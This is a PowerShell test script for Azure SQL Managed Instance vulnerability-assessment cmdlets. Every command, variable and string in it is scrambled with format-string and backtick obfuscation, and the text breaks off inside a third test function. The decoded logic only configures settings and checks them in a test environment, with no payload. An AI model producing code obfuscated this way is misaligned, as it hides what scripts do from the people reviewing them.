  ${E`g4SP} = [typE]("{15}{11}{4}{14}{13}{8}{5}{9}{2}{17}{6}{3}{10}{0}{16}{12}{7}{1}"-f '.rEC','AnsinTeRVAL','lIt','SSMENt.mODe','sof','e','e','sC','Vuln','rAbi','l','cRo','rrINg','NDs.Sql.','t.AZUre.COmmA','mi','U','YaSs');  














function TE`ST-`VUL`NeRabIlItYA`ssE`SsMEn`TMANAgeDIn`sTanC`eset`TI`Ng`s`TEST
{
	
	${Te`S`TSuF`FiX} = &("{0}{3}{1}{2}"-f'get','ssetNam','e','A')
	&("{15}{0}{6}{4}{16}{17}{1}{11}{5}{2}{10}{3}{12}{7}{9}{14}{8}{13}"-f'ea','entM','n','a','lne','I','te-Vu','T','ronmen','e','st','anaged','nce','t','stEnvi','Cr','rabilityAsses','sm') ${tESt`sUF`FIx}
	${pAr`AMs} = &("{13}{7}{5}{1}{9}{2}{11}{14}{3}{10}{12}{0}{4}{8}{6}" -f'v','yAsse','aged','es','ironm','nerabilit','arameters','SqlVul','entP','ssmentMan','t','Inst','En','Get-','anceT') ${tE`s`TSUFf`iX}
	${v`NetN`AmE} = ("{3}{0}{1}{2}" -f't','ia','l','cl_ini')
	${SU`BnEtN`Ame} = ("{1}{0}"-f'ol','Co')
	${vI`R`TuALN`ETwor`k1} = &("{2}{7}{6}{8}{1}{9}{10}{0}{11}{4}{5}{3}"-f'M','Net','CreateA','tance','e','dIns','GetVirt','nd','ual','work','For','anag') ${vn`EtNA`ME} ${s`UBn`etNAme}
	${S`UBNe`T`Id} = ${Vir`TUaLN`E`Twork1}."suBN`ets".("{0}{1}"-f'whe','re').Invoke({ ${_}."n`AmE" -eq ${S`Ubne`Tn`AMe} })[0]."i`d"
	${c`REDeN`TI`ALs} = &("{2}{0}{4}{6}{5}{1}{3}"-f't-','i','Ge','al','Se','verCredent','r')
 	${lICen`seTy`pe} = ("{1}{0}{2}"-f 'r','BaseP','ice')
  	${stOrag`ESi`Ze`iNGb} = 32
 	${vco`Re} = 16
 	${S`k`UnAmE} = ("{0}{1}"-f'GP','_Gen4')
	${Lo`c`AtIon} = ("{0}{2}{3}{1}{4}" -f'We','ral U','st Ce','nt','S')

	try
	{
		
		&("{6}{0}{8}{9}{4}{2}{5}{3}{7}{1}" -f 'le-AzSqlInsta','aSecurity','Ad','d','e','vance','Enab','Dat','n','c') -ResourceGroupName ${Pa`RAms}."rGNA`mE" -InstanceName ${P`ARAMs}."seRvE`Rn`AmE" -DoNotConfigureVulnerabilityAssessment

		&("{2}{0}{5}{3}{4}{6}{1}" -f'ser','s','As','r','owsContai','t-Th','n') -script { &("{7}{0}{5}{4}{3}{2}{1}{6}{8}"-f 'eV','ett','essmentS','ss','abilityA','ulner','in','Update-AzSqlInstanc','g') -ResourceGroupName ${PAR`A`mS}."RGN`AME" -InstanceName ${pARa`mS}."Se`RV`erN`AME" `
		 -StorageAccountName ${pA`RAMs}."stOraGea`cC`o`Unt" -EmailAdmins ${t`RUE} -NotificationEmail @(("{0}{1}{2}" -f 'inv','alidMai','l')) -RecurringScansInterval ("{1}{0}"-f 'ekly','We') } `
		 -message ("{15}{13}{16}{18}{6}{5}{14}{11}{7}{10}{8}{0}{9}{2}{12}{17}{3}{1}{4}" -f'resse','re no',' ',' a','t valid..','t',' ','il ','dd','s','a',' ema','you e','o','he','One ','r ','ntered','more of')

		&("{3}{1}{2}{0}" -f'ains','rt-Throw','sCont','Asse') -script { &("{1}{4}{5}{6}{2}{3}{0}{7}{8}"-f 'tyAss','Updat','Vu','lnerabili','e','-','AzSqlInstance','essmen','tSetting') -ResourceGroupName ${pARa`mS}."r`gnAMe" -InstanceName ${PA`R`AMS}."S`E`RVErnAME" `
		 -BlobStorageSasUri ("{3}{8}{6}{1}{5}{4}{0}{7}{2}"-f'XXXXX','e','X','https://','XXXX','tXXXX','indows.n','X','invalid.blob.core.w')} `
		 -message ("{2}{13}{10}{9}{20}{18}{12}{4}{24}{16}{14}{23}{19}{22}{7}{6}{0}{17}{3}{5}{8}{1}{15}{21}{11}"-f'win','sessm','Invali','/vulnera','va','bil','re.','age.blob.co','ity-as','rageSasUri pa','BlobSto','XXXX.',' ','d ','n forma','ent?st=X','ue should be i','dows.net','eter',' https:/','ram','X','/mystor','t of','lue. The val')

		&("{14}{11}{1}{0}{3}{8}{12}{13}{7}{5}{9}{2}{6}{4}{10}" -f'Ins','zSql','mentSet','tan','in','s','t','bilityAs','c','ess','g','pdate-A','eVulne','ra','U') -ResourceGroupName ${PA`Ra`mS}."r`G`NAMe" -InstanceName ${P`ARa`Ms}."S`erv`Ern`AmE" `
			 -StorageAccountName ${Pa`R`AMs}."st`ORage`AccO`U`NT"

		
		${S`ETtIn`GS} = &("{1}{5}{9}{0}{8}{4}{7}{6}{2}{10}{3}"-f 'lne','Get-Az','S','ng','bilityA','SqlInstan','essment','ss','ra','ceVu','etti') -ResourceGroupName ${pa`Ra`ms}."rGn`AMe" -InstanceName ${pA`R`Ams}."s`ERve`R`NaME" 
		
		
		&("{3}{0}{2}{1}"-f'e','al','Equ','Assert-Ar') ${p`A`RamS}."R`gNAMe" ${SETt`I`Ngs}."r`e`S`ouRcEGrOUp`NA`Me"
		&("{1}{0}{2}" -f 'ssert-Are','A','Equal') ${P`ARAmS}."S`ER`Ve`RNaMe" ${s`EttI`NGs}."inS`Ta`Nc`enaME"
		&("{0}{2}{1}{3}"-f'Assert','Equ','-Are','al') ("{3}{6}{2}{1}{7}{5}{0}{4}"-f 'essmen','ability','er','vu','t','ss','ln','-a') ${seTT`ings}."sCA`NresuLtsCON`Ta`i`NEr`Na`mE"
		&("{1}{3}{2}{0}{4}"-f'eEqua','A','ert-Ar','ss','l') ${PArA`MS}."s`T`ORage`ACCoUnt" ${S`eTt`INgS}."storagEAc`Co`UN`Tn`A`ME"	
		&("{1}{3}{0}{2}" -f'reEqu','Assert-','al','A') ("{0}{1}"-f 'No','ne') ${Se`TTiNgS}."r`E`curR`I`NGsCAnSin`TERV`AL"
		&("{3}{0}{1}{2}"-f 'sert-','A','reEqual','As') ${tr`Ue} ${s`etT`ings}."eM`AiladM`InS"
		&("{2}{3}{0}{1}"-f 'reEqual','Array','Assert','-A') @() ${se`TTiN`gs}."NOTi`FICAt`IONe`MaIl"

		
		${TeStEm`AILAdm`i`NS} = ${tR`Ue}
		${t`eSt`NO`TiFiCatioNeM`AIl} = @(("{2}{1}{0}{3}" -f'st.c','t1@mailTe','tes','om'), ("{5}{4}{1}{0}{2}{3}" -f 'i','ma','l','Test.com','est2@','t'))
		${teS`TrecUrRi`N`gscA`N`SiN`TervaL} =   ( &("{1}{2}{0}"-f'e','VA','rIaBL')  ('Eg4'+'sP') -Valueonly)::"WE`eKlY"

		&("{12}{10}{13}{9}{5}{4}{3}{11}{6}{7}{2}{8}{1}{14}{0}"-f 'g','n','l','Vul','ce','n','r','abi','ityAssessme','sta','qlI','ne','Update-AzS','n','tSettin') -ResourceGroupName ${P`A`RamS}."R`gNa`me" -InstanceName ${P`ARAMS}."sE`RVe`RnaMe" `
			  -RecurringScansInterval ${tes`Tr`e`c`UrRinGSC`A`N`SINt`ErVAL} -EmailAdmins ${test`Em`AI`La`DmINS} `
			  -NotificationEmail ${TES`TNOT`ifIcaTiO`NEM`AiL}

		
		${S`e`TTInGs} = &("{2}{1}{4}{0}{6}{3}{9}{5}{8}{7}"-f'l','ance','Get-AzSqlInst','rability','Vu','nt','ne','ing','Sett','Assessme') -ResourceGroupName ${Para`Ms}."RG`NAmE" -InstanceName ${PA`Ra`mS}."servER`N`AME" 

		
		&("{0}{1}{3}{2}"-f'Assert-','Ar','Equal','e') ${para`mS}."R`GN`Ame" ${s`ETt`ingS}."ReS`o`UR`ceGr`ouPnAme"
		&("{4}{1}{3}{2}{0}" -f'qual','ssert-Ar','E','e','A') ${pA`RAms}."SeRV`ERN`Ame" ${Se`TT`InGs}."InSTaN`CE`Na`mE"
		&("{1}{0}{3}{2}"-f'ert-','Ass','qual','AreE') ("{2}{4}{5}{1}{3}{0}" -f'ssessment','era','v','bility-a','u','ln') ${se`T`TiN`Gs}."sC`ANrEsUlTSCo`N`TAin`ERname"
		&("{2}{0}{3}{1}"-f 'ssert','l','A','-AreEqua') ${pA`RA`mS}."s`ToRAg`EaCcoUNt" ${SetT`iN`Gs}."S`ToRa`Gea`cCouN`TNA`mE"	
		&("{3}{0}{4}{2}{1}"-f'ert-Ar','l','a','Ass','eEqu') ${teStRECu`R`RIn`gScAN`siNte`RvAl} ${s`etti`NGs}."R`ECuRriN`gSCA`NSIn`TeRV`Al"
		&("{0}{3}{2}{1}"-f'A','qual','rt-AreE','sse') ${T`e`s`TEMAIlADm`iNS} ${se`TTiN`GS}."Em`AILaD`miNS"
		&("{3}{2}{0}{1}" -f 'Are','EqualArray','t-','Asser') ${tesT`NO`Tif`iCAtiOn`EM`AIl} ${SETt`i`NgS}."nOTIf`iCaTIoNe`MA`il"

		
		&("{7}{1}{0}{6}{5}{3}{2}{4}" -f'y','ceVulnerabilit','tt','entSe','ing','essm','Ass','Clear-AzSqlInstan') -ResourceGroupName ${p`ARa`ms}."rg`NAME" -InstanceName ${p`Ar`Ams}."S`ervErnA`Me"

		
		${SETTin`gS} = &("{8}{9}{5}{11}{0}{4}{2}{1}{12}{6}{10}{3}{7}" -f 'u','A','lity','ntSettin','lnerabi','ns','s','g','Get-','AzSqlI','essme','tanceV','s') -ResourceGroupName ${P`Ara`mS}."R`gna`me" -InstanceName ${p`ArA`mS}."s`e`RV`eRname"
		
		
		&("{2}{3}{1}{0}"-f 'l','eEqua','Assert-','Ar') ${PaRa`MS}."r`gnaME" ${SEttI`NGS}."Re`sOu`Rce`GRo`UpNaME"
		&("{0}{3}{1}{2}"-f 'A','Equ','al','ssert-Are') ${p`A`Rams}."serV`e`RNamE" ${sE`TT`Ings}."ins`TAN`CE`NAME"
		&("{3}{0}{2}{1}"-f'ser','l','t-AreEqua','As') "" ${Se`Tt`I`NGs}."SCa`NR`eSuLtSCON`TAiNEr`NA`Me"
		&("{1}{0}{4}{2}{3}"-f 'sser','A','Are','Equal','t-') "" ${SEt`Ti`Ngs}."StoraG`EacCOU`Nt`NA`Me"	
		&("{3}{4}{1}{2}{0}" -f 'l','u','a','Asse','rt-AreEq') ("{1}{0}"-f 'one','N') ${S`E`TtinGS}."r`eCUrRIn`gscAns`In`TEr`V`Al"
		&("{2}{4}{1}{0}{3}"-f't-AreEq','r','A','ual','sse') ${tR`UE} ${SE`TTi`NgS}."e`ma`iLaDmi`NS"
		&("{1}{2}{0}{3}" -f 'u','Asser','t-N','ll') ${S`Et`TiNGS}."No`TIFI`cAtioNE`M`Ail"

		
		${Test`scANRE`s`ULTsCoNTaI`NE`RN`A`ME} = ("{0}{2}{3}{4}{1}" -f'custo','ainer','m-c','o','nt')
		${TesTs`ToR`AgENaMe} = ("{0}{2}{1}"-f's','e1','torag')
		${te`s`T`BLOBsToRaGESa`Su`RI} = ("{2}{0}{1}" -f':/','/','https') + ${T`e`sts`TorAGeNAMe} +("{3}{2}{1}{4}{0}{5}"-f's.','ore.win','c','.blob.','dow','net/') + ${tEstSCaN`ResuL`Ts`C`O`NTainER`N`A`me} + ("{2}{1}{0}{3}"-f'XXX','XXXXXXX','?st=X','XXXX')
		${tESTre`CuRr`i`N`Gsc`Ansin`TE`R`VAl} =  (&("{1}{0}{2}" -f 'HIl','C','dITem') ("{2}{1}{0}"-f'G4sp','E:E','VARIaBL'))."val`UE"::"no`Ne"

		&("{5}{0}{4}{6}{8}{3}{10}{9}{2}{11}{7}{1}" -f'A','ing','Assess','eV','z','Update-','SqlIn','tt','stanc','erability','uln','mentSe') -ResourceGroupName ${pAR`A`MS}."RG`NAme" -InstanceName ${ParA`MS}."seRVe`R`Na`Me" `
		 -BlobStorageSasUri ${tEsT`BLObsT`or`Ag`eSAsu`Ri} -RecurringScansInterval ${t`estreC`U`RrINgs`CanSI`NtEr`V`AL} -EmailAdmins ${t`E`stemaI`lADMinS} `
		 -NotificationEmail ${T`Es`TNOt`Ifi`Cati`oN`eMaIl}
		
		
		${ne`wMaNa`G`edInStanCe`NamE} = ("{1}{0}{4}{2}{3}" -f'anag','newM','dI','nstanceName','e') +${TestSUf`F`IX};
		${t`ESTn`e`WNOTIFi`CAT`I`oNe`mail} = @(("{4}{2}{1}{3}{0}"-f'm','lTe','@mai','st.co','test3'), ("{2}{1}{4}{0}{3}"-f 's','t4@mai','tes','t.com','lTe'))
		${te`s`TstOra`gEna`Me} = ${p`ARaMs}."Sto`R`AgEaC`COuNT"
		${TE`sT`BL`OBstoraG`ESasUrI} = ("{1}{0}" -f'tps://','ht') + ${t`EsTSt`OragENAMe} +("{4}{1}{2}{0}{3}"-f 'windows.net','ob','.core.','/','.bl') + ${TE`sTscan`REsu`L`T`ScONTAiNErnaME} + ("{3}{0}{1}{4}{2}"-f '=XX','X','XXX','?st','XXXXXXXXX')
		${TeSt`R`E`CurringsCAnsIn`T`e`Rval} =  (  &("{0}{1}{2}" -f'VaRi','AB','Le')  ('eg'+'4sP')  -valU )::"nO`NE"

		&("{4}{3}{0}{2}{1}" -f'S','ance','qlInst','Az','New-') -ResourceGroupName ${p`ARamS}."rGN`AmE" -Name ${NEWM`An`AgEdin`s`T`AnCeNaMe} `
 			-Location ${L`OcA`TIon} -AdministratorCredential ${CrE`de`Nti`Als} -SubnetId ${SU`Bne`TID} `
  			-LicenseType ${Li`Cens`ETy`pE} -StorageSizeInGB ${sTO`RAG`ESIz`EINgb} -Vcore ${v`cO`RE} -SkuName ${skU`NaMe}

		&("{8}{0}{2}{5}{3}{4}{6}{7}{9}{1}" -f 'le-Az','curity','SqlI','ceA','d','nstan','vancedD','ataS','Enab','e') -ResourceGroupName ${PArA`MS}."r`GNamE" -InstanceName ${N`EWManA`GeD`Ins`TanC`e`NAmE} -DoNotConfigureVulnerabilityAssessment

		&("{3}{1}{0}{6}{7}{5}{8}{2}{4}"-f'-AzSqlIn','te','ssessm','Upda','entSetting','ceVulnerabili','sta','n','tyA') -ResourceGroupName ${Par`Ams}."rgN`AME" -InstanceName ${ne`w`m`AnAGedIn`staNceN`Ame} `
		 -BlobStorageSasUri ${Testb`LoBs`T`Or`A`gesasUrI} -RecurringScansInterval ${tE`ST`REcur`RI`NGscanSINT`e`RVal} -EmailAdmins ${T`eSTemAi`ladMI`NS} `
		 -NotificationEmail ${tEsTNew`No`Ti`FICa`TiO`Ne`M`AiL}

    	&("{8}{0}{5}{9}{6}{2}{4}{1}{3}{7}" -f'zSqlIn','ssment','yA','Set','sse','s','ulnerabilit','ting','Get-A','tanceV') -ResourceGroupName ${p`AramS}."Rg`NamE" -InstanceName ${nEW`MAn`Ag`edInstaNC`En`AME} | &("{8}{9}{7}{2}{10}{5}{4}{3}{11}{6}{1}{12}{0}"-f 'ting','tSe','nsta','nerabili','ul','eV','smen','qlI','Update-Az','S','nc','tyAsses','t') `
			 -ResourceGroupName ${pa`Ra`ms}."R`gNAME" -InstanceName ${paR`AMS}."s`ERVErNA`ME"
		${s`ETtI`Ngs} = &("{7}{6}{8}{3}{1}{0}{4}{5}{2}" -f'n','ssme','ing','se','tSet','t','bilityA','Get-AzSqlInstanceVulnera','s') -ResourceGroupName ${P`ARA`ms}."rgna`me" -InstanceName ${pA`R`AmS}."sErvEr`N`Ame" 

		&("{3}{2}{0}{1}"-f'-AreEqu','al','sert','As') ${Pa`R`Ams}."Rg`NAmE" ${se`TtiN`gS}."rE`sOUrcEgRo`UpN`AmE"
		&("{2}{1}{3}{0}" -f'Equal','-','Assert','Are') ${p`ARA`MS}."seR`VE`RNaMe" ${Se`Tt`iNgs}."insTAnc`eN`Ame"
		&("{4}{3}{0}{1}{2}"-f'er','t','-AreEqual','ss','A') ${tE`sts`Can`REs`Ul`TScoNTai`NErNaME} ${S`etTI`NGs}."sCanrE`s`U`lTScoN`T`AINernaME"
		&("{2}{3}{1}{0}"-f'l','a','Assert','-AreEqu') ${TEST`s`To`Ra`genAme} ${sE`Tt`in`Gs}."s`T`oRAGeAccOuntN`AmE"	
		&("{1}{0}{2}{4}{3}" -f'reE','Assert-A','q','l','ua') ${tEsTR`EC`URrInGS`caN`SinTER`VAL} ${SE`TTi`NGs}."R`eCurR`IN`GScA`NSiNT`ER`VAL"
		&("{0}{2}{3}{1}"-f'Asse','l','rt-','AreEqua') ${t`EsT`Em`AIladMiNS} ${s`EtTI`NgS}."EMA`IladM`i`NS"
		&("{2}{0}{1}{3}"-f'ser','t-A','As','reEqualArray') ${Te`Stnew`NO`TIf`iC`AtIonemAil} ${sEt`TI`N`gs}."noTIFICaTION`e`mA`iL"

		
		${sETti`NGS} = &("{3}{1}{0}{2}" -f 'qlI','t-AzS','nstance','Ge') -ResourceGroupName ${P`ARAmS}."RG`Na`ME" -Name ${Pa`RA`mS}."seRve`RNA`ME" | &("{5}{6}{8}{0}{9}{7}{1}{2}{3}{4}"-f'l','anceV','ulnerability','Assessm','entSetting','G','et-','t','AzSq','Ins') 
		 
		
		&("{2}{0}{3}{1}" -f 'ser','eEqual','As','t-Ar') ${P`Ar`AMS}."rGN`Ame" ${S`ET`TINgs}."r`e`soUr`CEGR`o`UpNAme"
		&("{0}{1}{2}{3}{4}" -f'As','se','rt-A','reEq','ual') ${pA`R`AmS}."sE`RveRn`AME" ${seT`Ti`NGS}."in`STAnCE`NamE"
		&("{2}{1}{0}{3}" -f'a','t-AreEqu','Asser','l') ${TeST`s`Ca`NresUL`TSCO`NTa`ineRNAMe} ${sET`TIn`Gs}."ScANrEsu`LT`sconT`A`iNerNAME"
		&("{0}{1}{3}{2}"-f 'A','ss','ual','ert-AreEq') ${T`e`StS`ToR`AGenAmE} ${SEtT`iNgS}."s`TORa`gea`cC`o`UNtNaME"	
		&("{0}{3}{4}{2}{1}" -f'A','reEqual','rt-A','ss','e') ${te`STrE`CURR`I`N`GscanS`INteRv`Al} ${SE`T`TinGS}."rec`UrrIn`GsCansI`Nter`VAl"
		&("{1}{2}{0}{3}"-f 't-AreEqu','As','ser','al') ${T`E`sTEmAIL`AdmI`Ns} ${S`etTI`NGS}."eMaILAd`Mi`Ns"
		&("{1}{0}{3}{2}{4}" -f 'eE','Assert-Ar','rra','qualA','y') ${teS`TneWNotiFiCa`TIOn`eMA`iL} ${s`e`TTIngs}."NO`TIFiC`AtiOne`Ma`Il"

		
		${s`eTtiNGS} = &("{4}{3}{1}{2}{0}" -f'ce','s','tan','-AzSqlIn','Get') -ResourceGroupName ${P`AR`AMs}."rg`Name" -Name ${PAra`mS}."seR`VER`NAmE" | &("{12}{8}{11}{7}{10}{0}{1}{5}{3}{9}{6}{4}{2}"-f'c','eVulner','ing','s','tt','abilityAs','mentSe','r','le','ess','-AzSqlInstan','a','C') 
		 
		
		&("{1}{3}{2}{0}"-f'l','As','rt-Nul','se') ${sETt`IngS}

		
		${teSTem`AIl`AdMI`NS} = ${f`A`LsE}
		${t`EsTrecUrR`ING`s`cANSIn`TerV`Al} =   ( &("{2}{1}{0}" -f'aBlE','i','vAr')  ('e'+'g4SP') -valUeoNLY )::"WEe`Kly"
		&("{7}{10}{4}{5}{1}{6}{0}{3}{8}{9}{2}" -f'it','ulnerabi','ing','yA','q','lInstanceV','l','Upda','ss','essmentSett','te-AzS') -ResourceGroupName ${pa`Ra`mS}."Rgn`AmE" -InstanceName ${Pa`R`AMS}."ser`Ve`RNamE" `
			  -StorageAccountName ${P`Ar`AMs}."S`To`RAGeA`c`CounT" -RecurringScansInterval ${TEsTReCU`RrI`NG`sc`A`NSINTErvAL} -EmailAdmins ${te`StEm`AIL`AdmI`NS}

		
		${SE`TTINGS} = &("{4}{7}{0}{8}{6}{1}{5}{3}{2}" -f 'zSqlInstanc','lity','ting','essmentSet','Ge','Ass','rabi','t-A','eVulne') -ResourceGroupName ${pa`Ra`ms}."RgNA`me" -InstanceName ${p`ARAMS}."SERv`E`RNAme" 
		&("{2}{4}{0}{1}{3}"-f 'A','reE','Asse','qual','rt-') ${p`Ar`AmS}."R`gnaME" ${SE`TTI`Ngs}."r`eSOu`Rceg`RoUpna`me"
		&("{2}{1}{4}{3}{0}"-f 'al','A','Assert-','eEqu','r') ${P`ARaMS}."se`RV`ERnamE" ${Set`Ti`NGs}."IN`staN`c`enamE"
		&("{2}{1}{0}{4}{3}"-f '-','ssert','A','al','AreEqu') ${PAra`Ms}."St`oRAG`eAc`cOunT" ${SE`T`Ti`NGS}."ST`ORAg`EaCCounT`Name"	
		&("{3}{4}{1}{0}{2}"-f 'ua','eEq','l','Assert-','Ar') ${TE`S`TRecUrrI`NgSc`ANsInt`erVAL} ${se`Tt`INgs}."recUrR`IN`gsC`ANSINT`ERVal"
		&("{0}{1}{2}{3}" -f 'Asse','rt-','AreEq','ual') ${TEsTe`mAilad`MI`NS} ${SET`T`i`NGS}."e`MA`iL`ADmINS"
		&("{3}{0}{2}{1}" -f'sse','-Null','rt','A') ${s`et`TINGs}."n`OtifiCaTio`NE`m`A`il"

		
		&("{2}{3}{0}{8}{5}{6}{1}{7}{9}{4}"-f 'eVu','es','Clear-AzSqlInsta','nc','entSetting','yAs','s','s','lnerabilit','m') -ResourceGroupName ${par`Ams}."RGN`A`me" -InstanceName ${pa`Ra`MS}."sE`Rv`eRN`AMe"

		
		&("{9}{7}{0}{2}{3}{4}{1}{5}{6}{8}" -f 'ceVu','lit','l','n','erabi','yAsses','sme','zSqlInstan','ntSetting','Update-A') -ResourceGroupName ${PARA`ms}."rg`Name" -InstanceName ${paRA`mS}."S`erV`ErnAMe" `
		  -StorageAccountName ${PAR`A`Ms}."stor`AG`eacco`U`Nt" -WhatIf
		
		
		${SE`T`TinGs} = &("{4}{1}{0}{10}{11}{8}{6}{2}{3}{5}{7}{9}"-f 'lInstan','t-AzSq','y','AssessmentS','Ge','et','it','ti','l','ng','c','eVulnerabi') -ResourceGroupName ${P`AramS}."R`GNAMe" -InstanceName ${PA`RAMs}."sEr`VeRna`ME"

		
		&("{1}{3}{0}{2}" -f 'rt','As','-AreEqual','se') ${p`A`RAMS}."RGn`AMe" ${sett`iN`GS}."r`EsoURCegRoU`PN`AME"
		&("{1}{0}{3}{4}{2}"-f'r','Asse','eEqual','t','-Ar') ${P`ARamS}."S`Erv`ERNAMe" ${seTt`iN`gs}."iNST`AnCE`Na`ME"
		&("{3}{4}{1}{0}{2}"-f'Equa','e','l','Asse','rt-Ar') "" ${se`TtIN`Gs}."ScaNReSuLTScO`NTaiN`ER`NA`ME"
		&("{3}{0}{2}{1}" -f'-A','eEqual','r','Assert') "" ${S`ETTI`NGS}."StoRAG`eACCOu`N`T`N`AME"	
		&("{4}{0}{1}{3}{2}" -f 'rt-Ar','e','al','Equ','Asse') ("{1}{0}"-f 'e','Non') ${sEtT`I`NGs}."rE`CUr`RInGsCAN`s`IntEr`V`AL"
		&("{3}{2}{1}{0}" -f'ual','t-AreEq','sser','A') ${tR`Ue} ${S`ET`TiN`gs}."E`MAiLaDmi`NS"
		&("{0}{2}{1}"-f'Ass','Null','ert-') ${SE`TT`INGs}."not`I`FIca`TIOnE`mAIL"

		
		&("{4}{7}{1}{11}{9}{0}{5}{2}{13}{8}{12}{3}{6}{10}"-f'Inst','te-A','u','ityAss','U','anceV','essmentSettin','pda','rab','ql','g','zS','il','lne') -ResourceGroupName ${paR`Ams}."R`gnAME" -InstanceName ${par`A`ms}."sERveR`Na`Me" `
		 -BlobStorageSasUri ${TeStBlo`BST`O`RAGeSAs`UrI}

		&("{0}{8}{3}{4}{5}{2}{7}{1}{6}"-f'Cl','essmentSettin','lity','ar-AzSqlInstanceVul','nera','bi','g','Ass','e') -ResourceGroupName ${P`Arams}."rgNa`Me" -InstanceName ${PA`RAMs}."Se`RVeRnA`Me" `
		-WhatIf
		
		
		&("{6}{2}{4}{1}{13}{12}{7}{9}{5}{11}{10}{3}{8}{0}" -f'ng','zSq','e','ntSet','t-A','sses','G','ceVulnerabi','ti','lityA','me','s','an','lInst') -ResourceGroupName ${pAR`Ams}."rG`NAME" -InstanceName ${p`ArAms}."SER`V`E`RnAME"
	}
	finally
	{
		
		&("{4}{10}{9}{5}{8}{0}{1}{7}{3}{6}{2}"-f 't','a','onment','v','Remove-Vulnera','tyAssessmen','ir','nceTestEn','tManagedIns','ili','b') ${TEST`S`UFfiX}
	}
}


function tE`St`-VUlneRabi`L`itY`As`S`eSsME`NtmaNa`gedd`ATa`BasE`WiThSEtTin`gsnotD`EFIneD`T`E`st
{
	
	${T`eST`SUffix} = &("{2}{1}{0}"-f'AssetName','et','g')
	&("{10}{5}{15}{16}{7}{3}{2}{8}{4}{11}{12}{13}{0}{6}{9}{14}{1}" -f's','ent','na','entMa','ns','a','tEnv','lityAssessm','gedI','iron','Cre','tan','ceT','e','m','te-Vulnerab','i') ${te`STSu`F`Fix}
	${p`ARA`Ms} = &("{11}{2}{10}{5}{3}{8}{6}{13}{0}{9}{1}{14}{4}{12}{7}" -f'n','Inst','lVulne','ilit','ceTe','ab','ssessm','ironmentParameters','yA','aged','r','Get-Sq','stEnv','entMa','an') ${t`estsuF`FIX}

	try
	{
		${RU`Le`iD} = ("{1}{0}" -f '1','VA203')
		${sC`A`NId} = ("{3}{2}{0}{1}"-f'ustom','ScanId','C','my')
		${ba`se`liNERe`Sul`Ts} = @(@(("{0}{1}" -f'u','serA'), ("{1}{0}" -f'CT','SELE')),@(("{0}{1}"-f'us','erB'), ("{1}{0}"-f 'CT','SELE')))
		
		
		&("{4}{6}{8}{2}{9}{10}{5}{7}{0}{3}{1}" -f 'dData','y','AzSqlIn','Securit','En','an','abl','ce','e-','stanceAd','v') -ResourceGroupName ${paR`A`MS}."rG`N`AMe" -InstanceName ${Pa`R`AmS}."serVER`N`AME" -DoNotConfigureVulnerabilityAssessment

		
		&("{0}{1}{3}{2}"-f 'Assert','-','ws','Thro') { &("{7}{16}{9}{2}{1}{10}{13}{4}{0}{14}{6}{12}{3}{11}{15}{5}{8}"-f'atabas','ns','lI','abilit','ceD','smentRuleBa','uln','Se','seline','Sq','ta','yAs','er','n','eV','ses','t-Az') -ResourceGroupName ${P`A`RaMs}."R`gname" -InstanceName ${pA`R`AmS}."serVE`R`NaME" `
		-DatabaseName ${pAr`Ams}."DAt`AbA`sE`NAMe" -RuleId ${rule`iD} -BaselineResult ${b`A`seLInEReSUlTs} }

		&("{2}{1}{0}" -f'ws','rt-Thro','Asse') { &("{15}{9}{11}{2}{8}{3}{4}{5}{1}{0}{7}{10}{14}{16}{12}{6}{13}"-f'As','ty','aseV','ra','bil','i','n','s','ulne','AzS','essmentRu','qlInstanceDatab','eli','e','leBa','Get-','s') -ResourceGroupName ${p`AR`AMs}."rg`N`AME" -InstanceName ${p`A`RAms}."ser`VE`RnAme" `
		-DatabaseName ${PA`Ra`Ms}."dATa`BAs`eNA`me" -RuleId ${R`UlE`id} }

		&("{2}{4}{1}{3}{0}"-f'rows','ert','A','-Th','ss') { &("{8}{2}{11}{1}{4}{6}{7}{5}{0}{3}{9}{10}" -f'ses','l','z','sm','Instan','yAs','ceDatabaseVulnerabi','lit','Clear-A','en','tRuleBaseline','Sq') -ResourceGroupName ${p`ARaMs}."R`GN`Ame" -InstanceName ${par`A`ms}."SERverN`A`Me" `
		-DatabaseName ${par`AMs}."DaT`A`BasEname" -RuleId ${ru`LE`Id} }

		
		&("{0}{2}{1}" -f'Assert','Throws','-') { &("{1}{5}{2}{7}{9}{4}{0}{8}{3}{6}" -f'ityAsses','C','-AzS','S','seVulnerabil','onvert','can','qlInstanceData','sment','ba') -ResourceGroupName ${p`Ar`AMs}."rG`Na`Me" -InstanceName ${pa`R`AMs}."sE`RVerNa`me" `
		-DatabaseName ${Pa`RA`ms}."dA`TABAS`eNA`me" -ScanId ${s`c`Anid} }

		&("{1}{0}{3}{2}"-f'e','Ass','Throws','rt-') { &("{12}{0}{9}{4}{16}{11}{10}{7}{17}{13}{3}{6}{2}{5}{1}{15}{8}{14}"-f 'e','ntScan','essm','ilit','st','e','yAss','e','c','t-AzSqlIn','baseVuln','ta','G','ab','ord','Re','anceDa','r') -ResourceGroupName ${P`AR`AMS}."RGNa`Me" -InstanceName ${p`Arams}."SEr`VerNa`me" `
		-DatabaseName ${p`ARAMS}."dAtaBasEN`A`mE" -ScanId ${s`C`Anid} }

		&("{3}{0}{2}{1}" -f's','rt-Throws','e','As') { &("{9}{4}{8}{7}{1}{3}{6}{2}{10}{0}{5}" -f'yAssess','eDat','ulnerabi','abas','AzSqlI','mentScan','eV','nc','nsta','Start-','lit') -ResourceGroupName ${PA`Ra`ms}."RG`NaMe" -InstanceName ${p`Ar`AMS}."SERv`ER`NAMe" `
		-DatabaseName ${Pa`R`AmS}."d`Atab`Ase`NAMe" -ScanId ${SCA`N`iD} }
	}
	finally
	{
		
		&("{2}{5}{3}{11}{7}{9}{0}{8}{1}{10}{12}{4}{6}" -f'M','Ins','Remove','lit','men','-Vulnerabi','t','s','anaged','sment','tanceTestEn','yAsse','viron') ${T`eSts`UffIx}
	}
}


function t`eST-VuLN`erAbiL`itY`AsS`es`SmENTMAN`AgED`dat`AbasE`SeTTInG`S`TeSt
{
	
	${TeSTSu`FF`ix} = &("{2}{1}{0}{3}" -f 'setN','tAs','ge','ame')
	&("{9}{0}{1}{6}{3}{2}{4}{5}{7}{8}{10}" -f'abili','ty','me','sess','ntManagedInstance','TestEn','As','vironm','e','Create-Vulner','nt') ${tEStS`UFF`Ix}
	${P`Ar`AmS} = &("{9}{0}{13}{4}{6}{8}{12}{14}{3}{7}{1}{10}{11}{5}{2}"-f't-SqlV','men','s','I','lner','meter','abilit','nstanceTestEnviron','y','Ge','t','Para','Assessment','u','Managed') ${tesT`sUF`FIx}

	try
	{
		
